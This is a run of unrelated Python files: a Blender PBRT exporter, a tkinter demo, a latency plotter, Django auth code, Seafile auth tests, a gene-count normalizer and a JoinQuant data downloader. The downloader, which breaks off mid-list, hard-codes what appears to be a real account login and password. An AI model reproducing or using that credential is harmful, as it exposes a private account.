                shutil.copyfile(bpy.path.abspath(node.image.filepath), pbrt.texture_path+node.image.name)
        else :
            print("file already exists")
    if node.type == "TEX_CHECKER":
        tex_type = "checkerboard"
        # Inputs 1 and 2 are the two checker colors, input 3 the scale.
        color1 = [node.inputs[1].default_value[0], node.inputs[1].default_value[1], node.inputs[1].default_value[2]]
        color2 = [node.inputs[2].default_value[0], node.inputs[2].default_value[1], node.inputs[2].default_value[2]]
        scale = node.inputs[3].default_value
        tex_parameter += "\"float uscale\" ["+str(scale)+"] \"float vscale\" ["+str(scale)+"] "
        # NOTE(review): str(list) emits commas ("[r, g, b]"); confirm pbrt
        # accepts this, other emitters here use space-separated values.
        tex_parameter += "\"rgb tex1\" " +str(color1)+" \"rgb tex2\" "+str(color2)+" "
    texture = "Texture \""+tex_name+"\" \"spectrum\" \""+tex_type+"\" " + tex_parameter
    data.append(texture)
    return "\"texture "+ socket.name + "\" \"" +tex_name+ "\""
# Export Socket
def Pbrt_ExportSockets(node, data):
    """Serialize all input sockets of `node` into one PBRT parameter string.

    Dispatches on the socket type (RGBA/INT/VALUE/BOOL/SHADER).  RGBA sockets
    fed by an image or checker texture are exported as texture references
    (the Texture statement itself is appended to `data`); SHADER sockets may
    likewise append MakeNamedMaterial statements to `data`.
    """
    parameters = ""
    for i in node.inputs:
        if i.type == "RGBA" :
            rgba = Pbrt_SocketRGBA(i)
            if(len(i.links) > 0):
                # A linked texture node overrides the plain rgb value.
                if i.links[0].from_node.type in ["TEX_IMAGE", "TEX_CHECKER"]:
                    rgba = Pbrt_AddTexture(i, i.links[0].from_node, data)
            parameters += rgba
        elif i.type == "INT" :
            parameters += Pbrt_SocketINT(i)
        elif i.type == "VALUE" :
            parameters += Pbrt_SocketVALUE(i)
        elif i.type == "BOOL" :
            parameters += Pbrt_SocketBOOL(i)
        elif i.type == "SHADER" :
            parameters += Pbrt_SocketSHADER(i, data)
        # Separate parameters with a space (also emitted for unknown types).
        parameters += " "
    return parameters
# Export Material in PBRT scene format
def Pbrt_ExportMaterial(pbrt_mat, data=None):
    """Serialize a PBRT material node as a `Material` statement.

    Fix: the original body referenced an undefined global `new_materials`,
    so every call raised NameError.  `data` now collects the auxiliary
    Texture / MakeNamedMaterial statements produced while exporting the
    sockets; callers may pass their own list to receive them (a throwaway
    list is used by default, keeping the old one-argument call working).
    """
    if data is None:
        data = []
    return "Material \"" + pbrt_mat.pbrt_name + "\" " + Pbrt_ExportSockets(pbrt_mat, data)
def Pbrt_ExistingExportMaterial(pbrt_mat, name, data):
    """Serialize a material node as a PBRT `MakeNamedMaterial` statement called `name`."""
    params = Pbrt_ExportSockets(pbrt_mat, data)
    return 'MakeNamedMaterial "{}" "string type" "{}" {}'.format(name, pbrt_mat.pbrt_name, params)
def Pbrt_ExportMaterialAreaLight(pbrt_mat):
    """Serialize a Blender emission material as a PBRT `AreaLightSource` statement.

    Follows the node feeding the Material Output "Surface" socket and scales
    its color (input 0) by its strength (input 1).
    """
    output_node = pbrt_mat.node_tree.nodes["Material Output"]
    emission = output_node.inputs["Surface"].links[0].from_node
    strength = emission.inputs[1].default_value
    color = emission.inputs[0].default_value
    scaled = " ".join(str(color[k] * strength) for k in range(3))
    return 'AreaLightSource "diffuse" "rgb ' + emission.inputs[0].name + '" [' + scaled + ']'
def Pbrt_ExportEnvironnement(pbrt_environement):
    """Serialize the environment node as a PBRT `LightSource "infinite"` statement.

    A linked TEX_ENVIRONMENT image is copied into the exporter's texture
    folder and referenced via `"string mapname"`; otherwise the socket's
    plain rgb value is used.
    """
    parameters = ""
    for i in pbrt_environement.inputs:
        if i.type == "RGBA" :
            rgba = Pbrt_SocketRGBA(i)
            if(len(i.links) > 0):
                tex_node = i.links[0].from_node
                if tex_node.type == "TEX_ENVIRONMENT" :
                    print(bpy.path.basename(tex_node.image.filepath))
                    try:
                        shutil.copyfile(bpy.path.abspath(tex_node.image.filepath), pbrt.texture_path+tex_node.image.name)
                    except IOError as io_err:
                        # Destination folder missing: create it and retry.
                        os.makedirs(pbrt.texture_path)
                        shutil.copyfile(bpy.path.abspath(tex_node.image.filepath), pbrt.texture_path+tex_node.image.name)
                    rgba = "\"string mapname\" [ \"textures/"+ bpy.path.basename(tex_node.image.filepath) + "\" ]"
            parameters += rgba
        elif i.type == "INT" :
            parameters += Pbrt_SocketINT(i)
        elif i.type == "VALUE" :
            parameters += Pbrt_SocketVALUE(i)
        elif i.type == "BOOL" :
            parameters += Pbrt_SocketBOOL(i)
        parameters += " "
    environement = "LightSource \"infinite\" " + parameters
    return environement
def Pbrt_ExportLamp(node, name):
    """Serialize an emission lamp node as a PBRT rgb parameter string.

    The color (input 0) is scaled by the strength (input 1); non-emission
    nodes yield an empty string.  The color is rendered as a Python list
    (comma-separated), matching the exporter's existing output.
    """
    if node.type != "EMISSION":
        return ""
    strength = node.inputs[1].default_value
    base = node.inputs[0].default_value
    scaled = [base[0] * strength, base[1] * strength, base[2] * strength]
    return '"rgb {}" {}'.format(name, scaled)
class PbrtMaterialNode(Node):
    """Base class for all custom PBRT shader nodes.

    Subclasses set `pbrt_name` to the PBRT material type string and add
    their typed input sockets in `init`.
    """
    bl_idname = "PbrtMaterialNode"
    bl_label = "Pbrt material Node"
    # PBRT material type name used when this node is serialized.
    pbrt_name = "pbrt_material"
    def init(self, context):
        # Every material exposes a single shader output socket.
        self.outputs.new("NodeSocketShader", "BRDF")
    def add_input(self, socket_type, name, default_value):
        """Create an input socket; a None default leaves the socket's own default."""
        input = self.inputs.new(socket_type, name)
        if default_value is not None:
            input.default_value = default_value
        return input
    def add_ouput(self, socket_type, name):
        # NOTE(review): "ouput" typo kept -- renaming would break any callers.
        output = self.outputs.new(socket_type, name)
        return output
    def draw_buttons(self, context, layout):
        layout.label(text="")
    def draw_label(self):
        return "PbrtMaterialNode"
class PbrtAreaLightNode(PbrtMaterialNode):
    """Diffuse area light: color L scaled by a strength factor."""
    bl_idname = "PbrtAreaLight"
    bl_label = "PBRT Area Light Node"
    pbrt_name = "area_light"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "L", (1.0, 1.0, 1.0, 1.0))
        # NOTE(review): "Strenght" is misspelled, but it is a runtime socket
        # name (the export code reads inputs by index) -- left unchanged.
        self.add_input("NodeSocketFloat", "Strenght", 1.0)
    def draw_label(self):
        return "Pbrt Areal Light"
class PbrtMatteMaterialNode(PbrtMaterialNode):
    """PBRT "matte" material: diffuse color Kd with sigma roughness."""
    bl_idname = "PbrtMatteMaterial"
    bl_label = "PBRT Matte Material Node"
    pbrt_name = "matte"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "sigma", 0.0)
    def draw_label(self):
        return "Pbrt Matte"
class PbrtPlasticMaterialNode(PbrtMaterialNode):
    """PBRT "plastic" material: diffuse Kd, specular Ks, roughness."""
    bl_idname = "PbrtPlasticMaterial"
    bl_label = "PBRT Plastic Material Node"
    pbrt_name = "plastic"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketColor", "Ks", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "roughness", 0.0)
    def draw_label(self):
        return "Pbrt Plastic"
class PbrtMetalMaterialNode(PbrtMaterialNode):
    """PBRT "metal" material: index of refraction eta, absorption k, roughness."""
    bl_idname = "PbrtMetalMaterial"
    bl_label = "PBRT Metal Material Node"
    pbrt_name = "metal"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "eta", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketColor", "k", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "roughness", 0.0)
        #self.add_input("NodeSocketFloat", "uroughness", None)
        #self.add_input("NodeSocketFloat", "vroughness", None)
        self.add_input("NodeSocketBool", "remaproughness", True)
    def draw_label(self):
        return "Pbrt Metal"
class PbrtMirrorMaterialNode(PbrtMaterialNode):
    """PBRT "mirror" material: perfect specular reflection with tint Kr."""
    bl_idname = "PbrtMirrorMaterial"
    bl_label = "PBRT Mirror Material Node"
    pbrt_name = "mirror"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "Kr", (1.0, 1.0, 1.0, 1.0))
    def draw_label(self):
        return "Pbrt Mirror"
class PbrtDisneyMaterialNode(PbrtMaterialNode):
    """PBRT "disney" material: the Disney principled BSDF parameter set."""
    bl_idname = "PbrtDisneyMaterial"
    bl_label = "PBRT Disney Material Node"
    pbrt_name = "disney"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "color", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "anisotropic", 0.0)
        self.add_input("NodeSocketFloat", "clearcoat", 0.0)
        self.add_input("NodeSocketFloat", "clearcoatgloss", 1.0)
        self.add_input("NodeSocketFloat", "eta", 1.5)
        self.add_input("NodeSocketFloat", "metallic", 0.0)
        self.add_input("NodeSocketFloat", "roughness", 0.0)
        #self.add_input("NodeSocketColor", "scatterdistance", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "sheen", 0.0)
        self.add_input("NodeSocketFloat", "sheentint", 0.5)
        self.add_input("NodeSocketFloat", "spectrans", 0.0)
        self.add_input("NodeSocketFloat", "speculartint", 0.0)
    def draw_label(self):
        return "Pbrt Disney"
class PbrtGlassMaterialNode(PbrtMaterialNode):
    """PBRT "glass" material: reflection Kr, transmission Kt, eta, roughness."""
    bl_idname = "PbrtGlassMaterial"
    bl_label = "PBRT Glass Material Node"
    pbrt_name = "glass"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "Kr", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketColor", "Kt", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "eta", 1.5)
        self.add_input("NodeSocketFloat", "uroughness", 0.0)
        self.add_input("NodeSocketFloat", "vroughness", 0.0)
        self.add_input("NodeSocketBool", "remaproughness", True)
    def draw_label(self):
        return "Pbrt Glass"
class PbrtKdsubsurfaceMaterialNode(PbrtMaterialNode):
    """PBRT "kdsubsurface" material: diffuse subsurface scattering."""
    bl_idname = "PbrtKdsubsurfaceMaterial"
    bl_label = "PBRT Kdsubsurface Material Node"
    pbrt_name = "kdsubsurface"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "mfp", 0.0)
        self.add_input("NodeSocketFloat", "eta", 1.3)
        self.add_input("NodeSocketColor", "Kr", (1.0, 1.0, 1.0, 1.0))
        # Fix: this socket was a duplicate "Kd"; pbrt's kdsubsurface material
        # takes the transmission coefficient "Kt" here.
        self.add_input("NodeSocketColor", "Kt", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "uroughness", 0.0)
        self.add_input("NodeSocketFloat", "vroughness", 0.0)
        self.add_input("NodeSocketBool", "remaproughness", True)
    def draw_label(self):
        return "Pbrt Kdsubsurface"
class PbrtSubstrateMaterialode(PbrtMaterialNode):
    """PBRT "substrate" material: layered diffuse (Kd) / glossy (Ks) model.

    NOTE(review): the class name is missing an 'N' ("Materialode"); it is kept
    because the module's `classes` registration tuple references it as-is.
    """
    bl_idname = "PbrtSubstrateMaterial"
    bl_label = "PBRT Substrate Material Node"
    pbrt_name = "substrate"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketColor", "Ks", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketFloat", "uroughness", 0.0)
        self.add_input("NodeSocketFloat", "vroughness", 0.0)
        self.add_input("NodeSocketBool", "remaproughness", True)
    def draw_label(self):
        # Fix: copy-paste error -- previously returned "Pbrt Kdsubsurface".
        return "Pbrt Substrate"
class PbrtMixtureMaterialNode(PbrtMaterialNode):
    """PBRT "mix" material: blends two named materials by `amount`."""
    bl_idname = "PbrtMixtureMaterial"
    # Fix: label typo "Mixure" -> "Mixture" (display string only;
    # bl_idname is unchanged so registration and NodeItem lookups still work).
    bl_label = "PBRT Mixture Material Node"
    pbrt_name = "mix"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketFloat", "amount", 0.5)
        self.add_input("NodeSocketShader", "namedmaterial1", None)
        self.add_input("NodeSocketShader", "namedmaterial2", None)
    def draw_label(self):
        # Fix: typo "Mixure" -> "Mixture".
        return "Pbrt Mixture"
class PbrtEnvironnementNode(PbrtMaterialNode):
    """Environment (infinite) light node: radiance color L and sample count.

    NOTE(review): bl_idname "PbrtEnvironementMaterial" is misspelled but must
    stay -- the NodeItem registration below uses this exact string.
    """
    bl_idname = "PbrtEnvironementMaterial"
    bl_label = "PBRT Environement Node"
    pbrt_name = "environement"
    def init(self, context):
        super().init(context)
        self.add_input("NodeSocketColor", "L", (1.0, 1.0, 1.0, 1.0))
        self.add_input("NodeSocketInt", "samples", 1)
    def draw_label(self):
        return "Pbrt Environement"
class PbrtNodeCategory(NodeCategory):
    """Node-menu category that only appears in the shader node editor."""
    @classmethod
    def poll(cls, context):
        # Show the PBRT category only for shader node trees.
        return context.space_data.tree_type == 'ShaderNodeTree'
# Identifier under which the PBRT node category is (un)registered.
identifier = 'PBRT_NODES'
# One "Add node" menu category listing every PBRT node by its bl_idname.
node_categories = [PbrtNodeCategory(identifier, "Pbrt Material Nodes", items=[
    NodeItem("PbrtMatteMaterial"),
    NodeItem("PbrtPlasticMaterial"),
    NodeItem("PbrtMetalMaterial"),
    NodeItem("PbrtMirrorMaterial"),
    NodeItem("PbrtDisneyMaterial"),
    NodeItem("PbrtGlassMaterial"),
    NodeItem("PbrtKdsubsurfaceMaterial"),
    NodeItem("PbrtSubstrateMaterial"),
    NodeItem("PbrtMixtureMaterial"),
    NodeItem("PbrtEnvironementMaterial"),
    NodeItem("PbrtAreaLight")
    ])]
# All node classes to (un)register; the abstract base PbrtMaterialNode is
# deliberately not listed.
classes = (
    PbrtMatteMaterialNode,
    PbrtPlasticMaterialNode,
    PbrtMetalMaterialNode,
    PbrtMirrorMaterialNode,
    PbrtDisneyMaterialNode,
    PbrtGlassMaterialNode,
    PbrtKdsubsurfaceMaterialNode,
    PbrtSubstrateMaterialode,
    PbrtMixtureMaterialNode,
    PbrtEnvironnementNode,
    PbrtAreaLightNode
    )
def register():
    """Register all PBRT node classes and their node-menu category."""
    for cls in classes:
        bpy.utils.register_class(cls)
    # Drop a stale category from a previous load before re-registering;
    # NOTE(review): _node_categories is a private nodeitems_utils attribute.
    if identifier in nodeitems_utils._node_categories:
        nodeitems_utils.unregister_node_categories(identifier)
    nodeitems_utils.register_node_categories(identifier, node_categories)
def unregister():
    """Unregister the PBRT node category and classes added by register()."""
    nodeitems_utils.unregister_node_categories(identifier)
    for cls in classes:
        bpy.utils.unregister_class(cls)
    # Fix: removed a trailing unregister_node_categories("PBRT_MATERIAL_TREE")
    # call -- that identifier is never registered anywhere in this module, so
    # the call always raised and made add-on disable fail.
|
# Small tkinter demo: Message widgets, Spinboxes, and a button that opens a
# Toplevel child window.
from tkinter import *
root = Tk()
w1 =Message(root,text='这是一则消息')
w1.pack()
w2 =Message(root,text='这是一则常常常常消息')# Message wraps long text automatically, like Text
w2.pack()
# Numeric spinbox over the range 0..10.
w3 =Spinbox(root,from_=0,to=10)
w3.pack()
# Spinbox cycling through a fixed tuple of string values.
w4 =Spinbox(root,values=("鸭子","鸡儿","山羊"))
w4.pack()
def create():
    top = Toplevel() # pop up a child window on top of the root window
    top.title("第二个窗口")
    msg = Message(top,text="哒哒哒哒哒") # Message uses the text option here
    msg.pack()
b = Button(root,text="创建顶级窗口",command=create)
b.pack()
mainloop()
|
# Measure TCP connect latency to a fixed set of hosts, persisting results to
# disk after every round, then plot delay-vs-time per host.
from tcp_latency import measure_latency
import numpy as np
import threading  # NOTE(review): unused in this script
import time
import pickle
import matplotlib.pyplot as plt
ip_addresses = [("New York", "162.243.19.47"), ("Greater Noida", "117.55.243.14"),
                ("Guangzhou", "202.46.34.74"), ("Chitose, Japan", "210.228.48.238"),
                ("Cruseilles, France", "62.212.113.125"), ("Presidente Prudente, Brazil", "177.43.35.247"),
                ("United Kingdom", "88.208.211.65"), ("Australia", "1.1.1.1")]
# Produce new delays
num_tests = 1000
# Column 0 holds the elapsed time stamp; one further column per host.
delays_np = np.zeros((num_tests, len(ip_addresses)+1))
pickle.dump(delays_np, open("delays.dat", "wb"))
initial_time_stamp = time.time()
pickle.dump(initial_time_stamp, open("initial_time_stamp.dat", "wb"))
for ii in range(num_tests):
    # Reload the start stamp from disk each round (allows restarting the
    # script while keeping the original time origin).
    initial_time_stamp = pickle.load(open("initial_time_stamp.dat", "rb"))
    time_stamp = time.time()
    results = [measure_latency(host=i[1], port=80, runs=1) for i in ip_addresses]
    # NOTE(review): measure_latency can return [None] on timeout, which would
    # make the float conversion below fail -- confirm hosts are reachable.
    results = np.hstack((np.array([[time_stamp - initial_time_stamp]]), np.mean(np.array(results, dtype=np.float64), axis=1).reshape(1,-1)))
    delays_np[ii] = results
    # print("\n\n\n")
    print("Test #"+str(ii+1))
    # print(delays_np)
    # Checkpoint all rows gathered so far.
    pickle.dump(delays_np, open("delays.dat", "wb"))
# Reuse existing delays
# delays_np = pickle.load(open("delays.dat", "rb"))
for i in range(len(ip_addresses)):
    plt.plot(delays_np[:,0], delays_np[:,i+1], label=ip_addresses[i][0])
plt.legend()
plt.title("Delays")
plt.xlabel("Time (seconds)")
plt.ylabel("Delay (milliseconds)")
plt.show()
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from django.shortcuts import render
from authapp import Forms
from authapp import models
from authapp.Forms import LoginForm
from authapp.models import registers
def home(request):
    """Render the public landing page."""
    template_name = 'index.html'
    return render(request, template_name)
# def home(request):
# loginform=LoginForm(request.POST)
# if loginform.is_valid():
# un=loginform.cleaned_data['email']
# pw=loginform.cleaned_data['Password']
# user=registers.objects.filter(email=un,Password=pw)
# if not user:
# return HttpResponse('index.html')
# else:
# login(request,user)
# return render(request,'welcome.html')
# else:
# return render(request,'index.html')
#
# @login_required
# def login(request):
# return render(request, "welcome.html")
# def my_logout(request):
# logout(request)
# return render(request,'index.html')
|
from django.db import models
from base.models import BaseModel
from django.contrib.auth.models import AbstractBaseUser, AbstractUser, BaseUserManager
class UserManager(BaseUserManager):
    """Manager providing creation helpers for the custom email-based User."""

    def create_simple_user(self, **kwargs):
        """
        Creates a user object.
        Returns:
            User obj -- the method returns the user object
        """
        user = self.create_user(kwargs.get('email'),
                                password=kwargs.get('password'))
        # NOTE(review): first_name/last_name/phone_number/sex/activity are not
        # declared on the visible User model -- presumably fields of BaseModel
        # or a profile mixin; TODO confirm they persist.
        user.first_name = kwargs.get('first_name')
        user.last_name = kwargs.get('last_name')
        user.phone_number = kwargs.get('phone_number')
        user.status = kwargs.get('status')
        user.sex = kwargs.get("sex")
        user.activity = [kwargs.get('activity', None)]
        user.save()
        return user

    def create_user(self, email, password=None, **extra_fields):
        """
        Creates and saves a User with the given email and password.

        Raises:
            ValueError: if no email is supplied.
        """
        if not email:
            raise ValueError('Users must have an email address')
        # Fix: extra_fields were accepted but silently discarded; forward them
        # to the model constructor as Django's manager convention expects.
        user = self.model(email=self.normalize_email(email), **extra_fields)
        user.set_password(password)
        user.save()
        return user

    def create_staffuser(self, email, password):
        """
        Creates and saves a staff user with the given email and password.
        """
        user = self.create_user(
            email,
            password=password,
        )
        user.staff = True
        user.save()
        return user

    def create_superuser(self, email, password):
        """
        Creates and saves a superuser with the given email and password.
        """
        user = self.create_user(
            email,
            password=password,
        )
        user.staff = True
        user.admin = True
        user.save()
        return user
class User(AbstractBaseUser, BaseModel):
    """Custom user model identified by email instead of a username."""
    ACTIVE = 'active'
    INACTIVE = 'inactive'
    # Choice pairs for `status` (named USER_ROLES, though it stores activity state).
    USER_ROLES = (
        (ACTIVE, ACTIVE),
        (INACTIVE, INACTIVE),
    )
    email = models.EmailField(unique=True, blank=False)
    objects = UserManager()
    has_logged_in_before = models.BooleanField(default=False)
    # `staff`/`admin` back the is_staff / is_admin properties below.
    staff = models.BooleanField(default=False)
    admin = models.BooleanField(default=False)
    is_deleted = models.BooleanField(default=False)
    status = models.CharField(max_length=200, choices=USER_ROLES, default=ACTIVE)
    # NOTE(review): UserManager.create_simple_user assigns `phone_number`,
    # but this field is named `phone` -- confirm which is intended.
    phone = models.CharField(max_length=18, null=True, blank=True)
    address = models.TextField(null=True, blank=True)
    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = []
    class Meta:
        verbose_name = ('user')
        verbose_name_plural = ('users')
    def has_perm(self, perm, obj=None):
        "Does the user have a specific permission?"
        # Simplest possible answer: Yes, always
        return True
    def has_module_perms(self, app_label):
        "Does the user have permissions to view the app `app_label`?"
        # Simplest possible answer: Yes, always
        return True
    @property
    def full_name(self):
        # NOTE(review): first_name/last_name are not declared on this model --
        # presumably provided by BaseModel; confirm, else this raises AttributeError.
        return f'{self.first_name.capitalize()} {self.last_name.capitalize()}'
    @property
    def is_staff(self):
        "Is the user a member of staff?"
        return self.staff
    @property
    def is_admin(self):
        "Is the user a admin member?"
        return self.admin
    def __str__(self):
        return "{}".format(self.email)
|
#coding: UTF-8
"""
Test auth related api, such as login/logout.
"""
import random
import re
from urllib import urlencode, quote
from tests.common.common import USERNAME, PASSWORD, SEAFILE_BASE_URL
from tests.common.utils import randstring, urljoin
from tests.api.urls import (
AUTH_PING_URL, TOKEN_URL, DOWNLOAD_REPO_URL, LOGOUT_DEVICE_URL
)
from tests.api.apitestbase import ApiTestBase
def fake_ccnet_id():
    """Return a random 40-character string shaped like a ccnet peer/device id."""
    return randstring(length=40)
class AuthTest(ApiTestBase):
    """This tests involves creating/deleting api tokens, so for this test we
    use a specific auth token so that it won't affect other test cases.
    """
    def test_auth_token_missing(self):
        # No Authorization header at all -> 403.
        return self.get(AUTH_PING_URL, token=None, use_token=False,
                        expected=403)
    def test_auth_token_is_empty(self):
        # Empty token value -> 401.
        return self.get(AUTH_PING_URL, token='', expected=401)
    def test_auth_token_contains_space(self):
        return self.get(AUTH_PING_URL, token='token with space', expected=401)
    def test_random_auth_token(self):
        return self.get(AUTH_PING_URL, token='randomtoken', expected=401)
    def test_logout_device(self):
        """Log in as a desktop client, sync a repo, then verify the api token
        is rejected after logging the device out."""
        token = self._desktop_login()
        self._do_auth_ping(token, expected=200)
        with self.get_tmp_repo() as repo:
            sync_token = self._clone_repo(token, repo.repo_id)
            self._get_repo_info(sync_token, repo.repo_id)
            self._logout(token)
            self._do_auth_ping(token, expected=401)
            # self._get_repo_info(sync_token, repo.repo_id, expected=400)
    def _desktop_login(self):
        """Obtain an api token by simulating a desktop client login."""
        data = {
            'username': USERNAME,
            'password': PASSWORD,
            'platform': 'windows',
            'device_id': fake_ccnet_id(),
            'device_name': 'fake-device-name',
            'client_version': '4.1.0',
            'platform_version': '',
        }
        return self.post(TOKEN_URL, data=data, use_token=False).json()['token']
    def _do_auth_ping(self, token, **kwargs):
        return self.get(AUTH_PING_URL, token=token, **kwargs)
    def _clone_repo(self, token, repo_id):
        """Return the repo sync token obtained by 'downloading' the repo."""
        return self.get(DOWNLOAD_REPO_URL % repo_id, token=token).json()['token']
    def _get_repo_info(self, sync_token, repo_id, **kwargs):
        # Sync API authenticates with a repo-scoped header, not the api token.
        headers = {
            'Seafile-Repo-Token': sync_token
        }
        url = urljoin(SEAFILE_BASE_URL,
                      'repo/%s/permission-check/?op=upload' % repo_id)
        self.get(url, use_token=False, headers=headers, **kwargs)
    def _logout(self, token):
        self.post(LOGOUT_DEVICE_URL, token=token)
|
# ========================================================================= #
# Logtistic Regression #
# Input: (36x36 + 1 Bias) *5 Classes = 1296
# Softmax Output = 5 Probabilities
# parameters = 3485
# About 40% Accuracy #
# ========================================================================= #
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
|
#Tessa Pierce
#2.8.13
#Normalize counts in the count matrix exported by remove_low_counts.py
#count matrix: contig \t sd2c \t sd3c \t br1c \t br2c \t ab1c \t ab2c \t scn1c \t scn2c \t pes1c \t pes2c \t bb1c \t bb2c \n
##RPKM = reads per kilobase per million mapped reads
import sys
#import numpy as np
from optparse import OptionParser
desc = """ This is a script that reads in a count table for the six populations and normalizes the counts by the lengths of the contigs relative to the SD length.
"""
parser = OptionParser(description = desc)
### Contig Name Conversion Table ###
parser.add_option("--counts", "--inCountsTable", help = "name of the input counts file", action = "store", type = "string", dest="counts")
parser.add_option("--cnv", "--Conversion", help = "name of the Contig Conversion table", action="store", type="string", dest="conversion")
### Output File ###
parser.add_option("--out", "--OutCountsTable", help = "name of the Output Counts Table File" , action="store", type="string", dest="out")
# Directory for Counts files and Output file #
# NOTE(review): opts.path is parsed but never used in this script.
parser.add_option("--dir", "--Directory", help = "path to all input files" , action="store", type="string", dest="path")
########input number of files for each population
parser.add_option("--sd", "--numSanDiego", help = "number san diego columns", action="store", type="int", dest="sd")
parser.add_option("--scn", "--numSantaCruz", help = "number of santa cruz columns", action="store", type="int", dest="scn")
parser.add_option("--pes", "--numPescadero", help = "number of pescadero columns", action="store", type="int", dest="pes")
parser.add_option("--bb", "--numBodegaBay", help = "number of bodega bay columns", action="store", type="int", dest="bb")
parser.add_option("--ab", "--numAbaloneCove", help = "number of abalone cove columns", action="store", type="int", dest="ab")
parser.add_option("--br", "--numBirdRock", help = "number of bird rock columns", action="store", type="int", dest="br")
(opts, args) = parser.parse_args()
# Open inputs/outputs; handles stay open until the cleanup at the bottom.
inCounts = open(opts.counts, 'r')
conversionFile = open(opts.conversion, 'r') #same conversion table used to convert the contig names
outNorm = open(opts.out, 'w')
# Parse both files into lists of tab-split rows.
counts_per_sd_contig = [ x.strip().split('\t') for x in inCounts.readlines() ]
conversionTable = [ x.strip().split('\t') for x in conversionFile.readlines() ]
#functions
def createLengthConversionDt(conversion, columns):
    """Build {contig_name: [ref_length, ...]} with one length per counts column.

    Each `conversion` row holds per-population reference contig lengths at
    fixed offsets (sd=1, br=3, ab=5, scn=7, pes=9, bb=11); `columns` is the
    ordered list of population codes for the counts table, so every contig
    maps to a length list aligned with its count columns.  Unknown codes in
    `columns` are skipped, matching the original if/elif chain.
    """
    offset_by_pop = {"sd": 1, "br": 3, "ab": 5, "scn": 7, "pes": 9, "bb": 11}
    length_table = {}
    for row in conversion:
        contig = 'SD' + row[0]
        length_table[contig] = [row[offset_by_pop[code]]
                                for code in columns if code in offset_by_pop]
    return length_table
def mapPopsToColumns(colsToAdd, popName, cols):
    """Append `colsToAdd` copies of the population code to `cols` and return it."""
    cols.extend([str(popName)] * colsToAdd)
    return cols
def normalizeCounts(inCounts, lengthConversion):
    """Length-normalize each contig's counts to reads-per-kilobase (RPK).

    Each count column is divided by its population's reference contig length
    (looked up in `lengthConversion`) and scaled by 1000.
    Returns {contig_name: [rpk, ...]}.
    """
    rpk_by_contig = {}
    for row in inCounts:
        contig = row[0]
        lengths = [float(x) for x in lengthConversion.get(contig)]
        counts = [float(x) for x in row[1:]]
        rpk_by_contig[contig] = [(c / l) * 1000 for c, l in zip(counts, lengths)]
    return rpk_by_contig
#main
#map populations back to the columns
columnList = mapPopsToColumns(opts.sd, "sd", [])
columnList = mapPopsToColumns(opts.br, "br", columnList)
columnList = mapPopsToColumns(opts.ab, "ab", columnList)
columnList = mapPopsToColumns(opts.scn, "scn", columnList)
columnList = mapPopsToColumns(opts.pes, "pes", columnList)
columnList = mapPopsToColumns(opts.bb, "bb", columnList)
# Per-contig reference lengths aligned with the count columns above.
lengthConversionDt = createLengthConversionDt(conversionTable, columnList)
headerLine = counts_per_sd_contig[0]
#create RPK dictionary of normalized counts (skip the header row)
RPK_Dt = normalizeCounts(counts_per_sd_contig[1:], lengthConversionDt)
# write out header line
outNorm.write('\t'.join(headerLine) + '\n')
# write out normalized (RPK) counts
for key, val in RPK_Dt.items():
    outNorm.write(key + '\t' + '\t'.join(map(str,val)) + '\n')
inCounts.close()
conversionFile.close()
outNorm.close()
sys.exit()
|
#-*-coding:utf-8 -*-
__author__ = 'Administrator'
from jqdatasdk import *
import pandas as pd
from jqdatasdk import *
import os
from datetime import datetime,timedelta
# Authenticate with JoinQuant.
# SECURITY(review): credentials are hard-coded in source -- move them to an
# environment variable or config file.
auth('13811866763',"sam155")
'''
一次性获取聚宽的财务数据,包括balance,case_flow,income,indicator表
目录在finance文件下,各子文件为'valuation', 'balance', 'cash_flow', 'income', 'indicator'
完全跑受到聚宽数据当天只能查询200w条记录的限制
'''
# (Above: one-shot download of JoinQuant fundamentals into per-table folders;
# a full run is limited by the 2M-records-per-day API quota.)
table_name = ['valuation', 'balance', 'cash_flow', 'income', 'indicator']
# Output folders, one per fundamentals table.
valuation_file_path = "C:\\quanttime\\data\\finance\\valuation\\"
balance_file_path = "C:\\quanttime\\data\\finance\\balance\\"
cash_flow_file_path = "C:\\quanttime\\data\\finance\\cash_flow\\"
income_file_path = "C:\\quanttime\\data\\finance\\income\\"
indicator_file_path = "C:\\quanttime\\data\\finance\\indicator\\"
# Load the full stock list (gbk-encoded CSV); column 0 holds the stock code.
stock_info = pd.read_csv("C:\\quanttime\\data\\basic_info\\all_stock_info.csv",encoding='gbk')
# Quarterly and annual statement periods to fetch, 2006 through 2018.
statdate=["2006q1","2006q2","2006q3","2006q4","2006", \
          "2007q1","2007q2","2007q3","2007q4","2007", \
          "2008q1","2008q2","2008q3","2008q4","2008", \
          "2009q1","2009q2","2009q3","2009q4","2009", \
          "2010q1","2010q2","2010q3","2010q4","2010", \
          "2011q1","2011q2","2011q3","2011q4","2011", \
